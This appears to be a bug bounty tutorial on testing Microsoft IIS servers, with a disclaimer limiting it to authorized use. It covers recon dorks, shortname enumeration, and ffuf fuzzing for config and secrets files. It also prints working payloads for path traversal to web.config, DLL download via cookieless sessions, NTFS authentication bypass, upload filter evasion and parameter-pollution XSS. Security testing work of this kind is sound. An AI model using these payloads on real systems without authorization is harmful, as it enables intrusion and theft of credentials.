Disclaimer: This article was written for educational and informational purposes only. The techniques described should be used only in authorized contexts, such as bug bounty programs, contractual penetration testing, or controlled lab environments. The author assumes no responsibility for improper or illegal use of the information contained in this article.
That classic IIS error page should never be treated as a dead end. In many cases, it's simply the visible front of a Windows web server that reveals far more than it should when approached with patience and the right methodology.
This article walks through a practical workflow for assessing IIS targets in bug bounty and security testing, focusing on techniques that consistently uncover misconfigurations, information disclosure, and potential attack paths.
Finding IIS Targets
Internet-Wide Search Engines
Before initiating active testing, check what internet-wide search engines already know about the target. Queries built around SSL certificates, organization names, and the "IIS" title can surface servers connected to the same company or certificate footprint.
ssl:"target.com" http.title:"IIS"
ssl.cert.subject.CN:"target.com" http.title:"IIS"
org:"target" http.title:"IIS"
The same approach can be extended to FOFA, Censys, Netlas, or Odin, since each platform indexes a different slice of exposed infrastructure.
Google Dorking
Search engines can also expose IIS fingerprints before any active probing begins. Patterns such as aspnet_client, _vti_bin, indexed .aspx pages, or pages containing Microsoft-IIS and X-Powered-By: ASP.NET often point directly to ASP.NET applications running on IIS.
site:target.com intitle:"IIS Windows Server"
site:target.com inurl:aspnet_client
site:target.com ext:aspx | ext:ashx | ext:asmx
site:target.com intext:"Microsoft-IIS" | intext:"X-Powered-By: ASP.NET"
site:target.com inurl:_vti_bin
site:target.com intitle:"Microsoft Internet Information Services"
Nested wildcard searches may also uncover development or staging hosts that normal enumeration misses.
site:*.target.com intitle:"IIS"
site:*.*.target.com intitle:"IIS"
Active Fingerprinting
The fastest confirmation usually comes from HTTP response headers. Raw requests over TCP or TLS can reveal telltale headers.
nc -v target.com 80
openssl s_client -connect target.com:443
Look for:
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
For broader coverage, use httpx or nuclei to identify IIS hosts at scale.
httpx -l targets.txt -td | grep IIS | tee iis-targets.txt
Early Information Disclosure
Some IIS front ends, especially Exchange or OWA deployments, may disclose internal addressing details when they receive an HTTP/1.0 request. In those cases, the Location header may contain a private IP and the response may also expose the X-FEServer value.
curl -v --http1.0 http://example.com
HTTP/1.1 302 Moved Temporarily
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
Those details can reveal internal hostnames or routing information that become useful later in the assessment.
Scanning and Enumeration
Nuclei for Broad Checks
Once IIS hosts are collected, launch tag-based nuclei scans in the background while manual testing continues.
nuclei -l iis-targets.txt \
-tags microsoft,windows,asp,aspx,iis,azure,config,exposure -silent
HTTPAPI 2.0 Responses
A generic HTTPAPI 2.0 404 should not be dismissed as an empty target. It's often a sign that the application expects a different Host header and is bound to a specific virtual host.
Two ways to continue: inspect the SSL certificate for hostnames in the subject or SAN fields, or brute-force the virtual host with a tool such as ffuf.
ffuf -u https://TARGET_IP/ -H "Host: FUZZ.target.com" -w vhosts.txt -fs 0
If the correct hostname is found, the same endpoint may begin serving the real application instead of the generic error page.
IIS Tilde Enumeration
IIS shortname enumeration is one of the most valuable legacy behaviors to test. Because of DOS 8.3 filename handling, specially crafted requests may disclose shortened names for files and directories even when directory listing is disabled.
shortscan https://target.com/ -F -p 1
Burp's IIS Tilde Enumeration Scanner is also an effective alternative.
Typical output can include entries such as:
File: WEB~1.CON
File: GLOBAL~1.ASA
File: SITEBA~1.ZIP
Dir: ADMIN~1
Short names like WEB~1.CON strongly suggest web.config, but names such as SITEBA~1.ZIP require additional work to recover the likely full filename.
Resolving Shortnames
LLM-Assisted Guessing
One approach is using an LLM to propose possible filename completions from the visible fragment, while constraining the output to simple alphanumeric guesses.
Return only a list of words, separated by newlines, and nothing else. Ensure that the words contain only alphanumeric characters.
Make a list of guesses, for what the rest of the word could be from this snippet. Ensure that the snippet is a substring of your guess.
Make the list as extensive as possible.
Snippet: {shortname}
GitHub Code Search
GitHub code search can serve as a large real-world filename corpus. By searching for filenames that begin with the first six characters of the shortname and end with the expected extension, it becomes easier to build realistic guesses.
path:/.ds_st
path:/global*.asa
path:/connec*.config
Tools like GSNW and GitHub-IIS-Shortname-Generator can help turn those fragments into focused wordlists.
python gsnw.py "siteba" output.txt
python scanner.py WEBDEV
Example output:
Found matches:
--------------------------------------------------
- WebDev.md
- WebDeveloper.java
- webdev.txt
- webdevicons.lua
--------------------------------------------------
Total unique matches: 86
The tool shortnameguesser is another option for generating targeted guesses from shortname scanner output.
BigQuery on Public GitHub Data
An Assetnote-inspired workflow uses Google BigQuery's public GitHub dataset. With a regular expression that matches the known prefix and extension, the dataset can return filenames that resemble the hidden resource.
SELECT DISTINCT path
FROM `bigquery-public-data.github_repos.files`
WHERE REGEXP_CONTAINS(path, r'(?i)(\/siteba[a-z0-9]+\.zip|^siteba[a-z0-9]+\.zip)')
LIMIT 1000
This reduces blind guessing by replacing it with filenames observed in real repositories, such as sitebackup.zip or sitebase.zip.
Brute-Forcing Remaining Characters
If smarter approaches fail, fall back to brute-force generation with crunch. The idea is to generate suffixes and then fuzz the target with several naming patterns.
crunch 4 6 abcdefghijklmnopqrstuvwxyz -o wordlist.txt
For a shortname like DESKTO~1.ZIP, try plain concatenation, hyphens, underscores, and URL-encoded spaces through ffuf.
ffuf -w wordlist.txt -u https://target.com/desktoFUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop-FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop_FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktop%20FUZZ.zip -mc 200,301,302,403
ffuf -w wordlist.txt -u https://target.com/desktopFUZZ.zip -mc 200,301,302,403
The %20 variation matters because Windows filenames may contain spaces and IIS can still serve those files without issue.
IIS-Specific Fuzzing
Generic wordlists are not enough for IIS testing. Target files and endpoints that are specific to IIS and ASP.NET deployments.
/web.config
/web.config.bak
/web.config.old
/web.config.txt
/global.asax
/trace.axd
/elmah.axd
/connectionstrings.config
/appsettings.json
/appsettings.Development.json
/appsettings.Staging.json
/appsettings.Production.json
/appsettings.Local.json
/secrets.json
/WS_FTP.LOG
/_vti_pvt/service.cnf
Files such as trace.axd and elmah.axd are important because they may expose request logs, headers, cookies, and sometimes credentials when left enabled.
Always fuzz with extensions that are common in the IIS and .NET ecosystem.
.asp,.aspx,.ashx,.asmx,.wsdl,.wadl,.config,.xml,.zip,.txt,.dll,.json
ffuf -u https://target.com/FUZZ -w iis-wordlist.txt \
-e .asp,.aspx,.ashx,.asmx,.config,.json,.xml,.zip,.bak,.txt \
-mc 200,301,302,403 -fs 0
Several wordlist sources are worth using: SecLists IIS.txt, Orwa's iis.txt, Orwa's aspx.txt, wfuzz iis.txt, dirbuster-ng iis.txt, Assetnote wordlists, and OneListForAll.
Remember that IIS is case-insensitive, so lowercase deduplicated lists are preferred to avoid wasting requests.
High-Value Files and Paths
web.config Exposure
Reading web.config is a major objective because these files may include machine keys used for signing and encrypting ViewState. If those keys are recovered, they can support malicious ViewState payloads and remote code execution through deserialization. Tools like ysoserial.net can generate the payload once you have the keys.
Possible path traversal payloads:
GET /download?id=../../web.config
GET /download?id=..%2f..%2fweb.config
DLL Access Through Cookieless Sessions
ASP.NET's legacy cookieless session feature allows embedding session tokens directly in the URL path using (S(X)) syntax. This can be abused to confuse IIS's path resolution and access the bin directory even when it should be blocked.
GET /(S(X))/b/(S(X))in/Newtonsoft.Json.dll
The same pattern can be reused for application-specific DLLs once their names are known.
GET /(S(X))/b/(S(X))in/WebApplication1.dll
GET /(S(X))/b/(S(X))in/App_Code.dll
GET /(S(X))/b/(S(X))in/MyCustomAPI.dll
Downloaded DLLs can then be decompiled with tools such as JetBrains dotPeek or dnSpy to inspect hardcoded credentials, API keys, internal logic, or custom authentication flows.
Reverse Proxy Path Confusion
When IIS is behind a reverse proxy, path normalization differences can sometimes bypass access control. A path like the following may be treated differently by the proxy and by IIS.
/anything/..%2fadmin/
The proxy may forward the request as if it targeted /anything/, while IIS decodes %2f, resolves traversal, and serves /admin/.
NTFS-Based Authentication Bypass
IIS 7.5-era tricks involving NTFS alternate data streams and index allocation can sometimes bypass basic authentication. Paths such as the following may work because the security check and the filesystem do not interpret them the same way.
/admin::$INDEX_ALLOCATION/admin.php
/admin:$i30:$INDEX_ALLOCATION/admin.php
Upload and WAF Bypasses
File Upload Edge Cases
If an upload feature blocks .asp and .aspx, IIS still renders several other extensions as text/html, which can create stored XSS opportunities.
Extensions that render as HTML:
.cer
.hxt
.htm
XML-related extensions that may support XML-based XSS vectors:
.dtd, .mno, .vml, .xsl, .xht, .svg, .xml, .xsd,
.xsf, .svgz, .xslt, .wsdl, .xhtml
IIS also has a quirk with trailing dots in filenames. If shell.aspx is filtered, variants with one or more trailing dots may still be accepted and then served normally.
shell.aspx.
shell.aspx..
shell.aspx...
Server-side include extensions worth testing:
.stm, .shtm, .shtml
HTTP Parameter Pollution
As a final bypass technique, HTTP Parameter Pollution can sometimes work against WAFs. By splitting a payload across duplicated parameters, the WAF and the backend may parse the request differently.
https://target.com/page?param=<svg/¶m=onload=alert(1)>
IIS and ASP.NET concatenate duplicate parameter values with a comma by default, which may reconstruct the payload after the WAF check.
Final Thoughts
The attack surface of IIS in bug bounty is wide but consistently under-tested. Everyone's off chasing the latest JavaScript framework vulnerability while these Windows boxes sit there, leaking internal IPs, serving up their own config files, and running with shortname enumeration wide open.
Don't skip the blue screen. Recon harder.
© 2026 Marco Altomare – All rights reserved.
The contents of this article, including text, code, and the techniques described, are protected by copyright. Reproduction, distribution, or modification without the author's written permission is prohibited. For collaborations, quotations, or commercial uses, please contact the author directly.
The techniques described are provided solely for educational and security research purposes. The author assumes no responsibility for improper or illegal use of the information contained therein. Use these techniques only in authorized environments and in compliance with applicable regulations.
Top comments (0)